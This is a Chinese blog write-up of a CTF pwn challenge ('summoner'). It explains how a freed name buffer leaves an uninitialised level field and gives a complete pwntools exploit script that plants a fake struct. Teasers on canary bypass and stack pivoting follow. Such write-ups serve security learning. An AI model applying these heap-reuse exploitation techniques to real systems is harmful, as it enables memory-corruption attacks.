metasequoia :Summoner

最新推荐文章于 2025-01-05 23:20:05 发布
原创 最新推荐文章于 2025-01-05 23:20:05 发布 · 323 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文探讨了一种利用结构体内存布局的漏洞进行攻击的方法。通过精心构造假的结构体实例并利用释放和重新分配过程中的缺陷,可以使程序进入预设的状态。文章详细展示了如何在特定条件下使level字段达到期望值,进而触发特定行为。此技术适用于pwn竞赛及安全研究。

在这里插入图片描述

结构体

struct Creature{
	char* name;
    unsigned int level;
};

思路

在这里插入图片描述

  • level为5时即可
    在这里插入图片描述

  • 但是写入限制了level只能为4

漏洞

在这里插入图片描述

  • 只释放了申请的name,然后把creature设为NULL,没有释放creature
  • 并且申请creature时没有清空level

在这里插入图片描述

  • 使用前没有初始化level, 可以现在name中写入一个假的creature,再释放,使得再次申请Craeture时level正好为之前的5

exp

from pwn import *
#context.log_level = 'debug'
context(os='linux', arch='amd64')
elf=ELF('./a.dms')
#sh=process('./a.dms')
sh=remote('ctf.metasequoia.tk', 29579)
#gdb.attach(sh)

def cmd(s):
	sh.recvuntil('> ')
	sh.sendline(s)

def summon(name):
	cmd('summon '+name)
	sh.recvuntil('"\n')

def release():
	cmd('release')
	sh.recvuntil('Released.\n')

def strike():
	cmd('strike')

fakeCreature='A'*8+p64(5)

summon(fakeCreature)
release()
summon('chh')
strike()

sh.interactive()
从pwn-summoner理解first fit
weixin_44864859的博客
07-06 402
本文主要为观看bili53448916889师傅讲解视频的学习笔记。 首先拖进ida中进行代码审计。以下是main函数的伪代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rsi char **v5; // [rsp+0h] [rbp-240h] unsigned int level; // [rsp+1Ch] [rbp-224h] void **v7; // [rsp+20h]
Metasequoia for Mac(水杉3D建模器)
macxingchendahai的博客
12-19 311
Metasequoia for Mac版是一款水杉3D建模器,具有基本的多边形编辑功能,还具有协助更精细处理的功能,使您能够使用在各种其他应用程序中创建的对象。 Metasequoia for Mac版软件介绍 目前,3D建模应用程序的需求量很大,因为平面设计师,游戏开发人员和动画师需要专门的工具来帮助他们创建新的更好的内容,使用范围很广,从爱好到业务,如游戏制作的三性维形状数据,重视效率和数据的可移植等等,准确的说它是一款3D模型建模软件。 Metasequoia Mac版功能介绍 强大的建模功能 水
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 573
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuoj Pwn writeup 286-290
yongbaoii的博客
09-06 315
286 metasequoia_2020_blacksmith 287 secretHolder_hitcon_2016 288 pwnable_dubblesort 289 pwnable_applestore 290 xp0intctf_2018_tutorial1
MetaseQuoia3D模型设计Crack
q2315702359的博客
03-22 165
MetaseQuoia是一个专门为3D模型设计的程序,现在所有有兴趣以不同格式创建自己的模型的人都可以满足他们的需求。该软件不是超级专业人士使用的,但它似乎是该领域更复杂实用程序的一个很好的替代品,特别是因为它易于使用,并对该软件能够处理的各种格式提供了良好的支持。各种进出口格式,如DXF、LWO、3DS、COB、OBJ等。的支持,但先进人士不会认为这是一个问题。从初学者到专业人士的许多有用功能。您可以使用SDK创建的插件。
探索高性能SQL解析器:metasequoia-sql
gitblog_00579的博客
09-04 1043
在数据处理和分析的世界中,SQL(Structured Query Language)是不可或缺的工具。然而,随着数据量的增长和查询复杂性的提升,一个高效、可靠的SQL解析器变得尤为重要。今天,我们将介绍一款名为`metasequoia-sql`的开源项目,它以其卓越的性能和灵活性,正逐渐成为Python社区中SQL解析的首选工具。 ## 项目介绍 `metasequoia-sql`是一款专注...
实用的3D建模软件:Metasequoia for Mac
weixin_49864678的博客
04-21 353
Metasequoia for Mac是专业的3D建模软件,你可以使用metasequoia mac特别版设计人物建模、动物角色等,建模功能十分强大,metasequoia mac版非常适合初学者和3D建模专业人士,需要水杉建模Mac版的朋友可以来试试metasequoia 4最新特别版吧! metasequoia for mac软件介绍 Metasequoia 4是适用于Windows或macOS / OS X的3DCG建模软件。您可以在不同平台上以相同的方式使用它。 所有GUI组件都通过矢量绘
metasequoia-sql 项目教程
gitblog_00332的博客
09-04 721
``` metasequoia-sql/ ├── docs/ │ └── ... # 项目文档文件 ├── metasequoia_sql/ │ ├── core/ │ │ └── ... # 语法树解析模块 │ ├── lexical/ │ │ └── ... # 词法树解析模块 │ ├── analyzer/ │ │ └── ... # 语法树分析模块 ...
作品:Python 实现的 Java 解析器(metasequoia-java)
最新发布
长行
01-05 493
水杉 Java 解析器为纯 Python 开发,不依赖其他第三方包,在任意环境下直接 pip 安装即可(在词法解析层,我们采用有限状态自动机实现;在语法解析层,我们采用调用的方式实现。与其他解析逻辑一样,我们采用词法解析与语法解析分离的解析器实现方案。
Metasequoia 4.8.0:三维人物建模软件神器
资源摘要信息:"Tetraface Inc Metasequoia 4.8.0 是一款专业的三维模型设计软件,特别适合于人物建模或动物角色的创建。该软件提供了一系列的专业工具和解决方案,使用户能够高效地进行三维设计工作,而无需安装多个...
精选资源
日本3D水杉建模工具 Metasequoia 4.6.5 + x64 中文汉化版.zip
03-22
Metasequoia 又称水杉建模,这是一款体积小巧的3D建模软件,由O.Mizno先生开发,可以用于一些游戏中的三维形状数据制作等等,并拥有强大的可移植功能,是3D建模不可多得的一款工具。Metasequoia 是适用于 Windows 或...
水杉软件 Metasequoia 汉化中文版
05-19
Metasequoia是基于多边形建模创建使用CAD和3DCG,如游戏制作的三性维形状数据。重视效率和数据的可移植,可以使用范围很广,从爱好到业务。 1、强大的建模功能 水杉具有基本的多边形编辑功能。它还具有协助更精细...
Metasequoia 4.6.5 中文版:全面解析3D建模神器
Metasequoia 4.6.5是一款由日本开发者O.Mizno先生开发的3D建模软件,它体积小巧但功能强大,可用于游戏开发、三维图形设计等领域。在3D建模领域,Metasequoia以其易用性、强大的功能以及高可移植性而著称。...
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 3353
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2589
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
scanf源码分析
chennbnbnb的博客
12-02 1513
本文分析的是glibc2.31中的scanf相关源码,目的不是研究scanf的算法,而是说明scanf在IO attack中的利用方法,属于CTF的范畴 scanf.c 其实就是对__vscanf_internal的封装 __scanf (const char *format, ...) { va_list arg; int done; va_start (arg, format); done = __vfscanf_internal (stdin, format, arg, 0)
栈迁移/栈劫持
chennbnbnb的博客
01-30 1082
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
ASLR与PIE
chennbnbnb的博客
01-14 933
全称 ASLR:Address Space Layout Randomization PIE:Position Independent Executables 作用 ASLR:随机放置关键数据的地址空间,放置攻击者跳转到内存特定位置 PIE:生成相对寻址的位置无关的可执行程序 谁实现? ASLR:操作系统 cat /proc/sys/kernel/randomize_va_space:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值